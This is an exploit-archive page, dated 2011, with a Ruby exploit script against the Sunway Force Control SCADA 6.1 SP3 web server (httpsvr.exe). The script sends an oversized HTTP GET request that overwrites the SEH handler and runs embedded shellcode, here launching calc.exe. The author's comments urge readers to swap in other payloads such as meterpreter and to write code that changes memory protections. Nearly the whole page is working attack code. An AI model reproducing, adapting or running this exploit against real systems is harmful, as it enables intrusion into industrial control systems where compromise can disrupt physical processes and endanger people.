[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit
# Published : 2011-08-26
# Author :
# Previous Title : Wireshark console.lua pre-loading vulnerability
# Next Title : VMware Update Manager Directory Traversal


# Sunway Force Control SCADA httpsvr.exe Exploit
# Exploitable with simple SEH Overwrite technique
# Tested on XP SP0 English
# Probably will work on XP SP3 if you find none-safeseh dll for p/p/r pointer
# Canberk BOLAT | @cnbrkbolat
# cbolat.blogspot.com 
# for fun ;)
#
# notez: other payloads not working stable because of memory region's status.
# i tested meterpreter/bind_tcp and others some of them not work because of
# trying to write to unwritable memory regions.
# if you write some asm for changing access protection of memory region
# it can be work. try it, do it!
#
# Vendor: http://www.sunwayland.com.cn/

def send(packet)
	begin
		sock = TCPSocket.new(@ip, @port)
		sock.write(packet)
	rescue Exception => e
		return false
	else
		resp = sock.recv(1024) 
		sock.close
		
		return true
	end
end

@ip = ARGV[0]
@port = 80

# windows/exec CMD=calc.exe
shellcode = "xb8xd5x45x06xc4xdaxdexd9x74x24xf4x5bx33xc9" +
			"xb1x33x31x43x12x03x43x12x83x3exb9xe4x31x3c" +
			"xaax60xb9xbcx2bx13x33x59x1ax01x27x2ax0fx95" +
			"x23x7exbcx5ex61x6ax37x12xaex9dxf0x99x88x90" +
			"x01x2cx15x7exc1x2exe9x7cx16x91xd0x4fx6bxd0" +
			"x15xadx84x80xcexbax37x35x7axfex8bx34xacx75" +
			"xb3x4exc9x49x40xe5xd0x99xf9x72x9ax01x71xdc" +
			"x3bx30x56x3ex07x7bxd3xf5xf3x7ax35xc4xfcx4d" +
			"x79x8bxc2x62x74xd5x03x44x67xa0x7fxb7x1axb3" +
			"xbbxcaxc0x36x5ex6cx82xe1xbax8dx47x77x48x81" +
			"x2cxf3x16x85xb3xd0x2cxb1x38xd7xe2x30x7axfc" +
			"x26x19xd8x9dx7fxc7x8fxa2x60xafx70x07xeax5d" +
			"x64x31xb1x0bx7bxb3xcfx72x7bxcbxcfxd4x14xfa" +
			"x44xbbx63x03x8fxf8x9cx49x92xa8x34x14x46xe9" +
			"x58xa7xbcx2dx65x24x35xcdx92x34x3cxc8xdfxf2" +
			"xacxa0x70x97xd2x17x70xb2xb0xf6xe2x5ex19x9d" +
			"x82xc5x65"
			
payload = "H" * 1599
payload << "xebx06x90x90" # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
payload << "x90" * 40
payload << shellcode
payload << "x90" * (4058 - shellcode.length)

pack = "GET /#{payload} HTTP/1.1rn"
pack << "Host: http://#{@ip}:#{@port}rnrn"

puts "packet sended." if send(pack)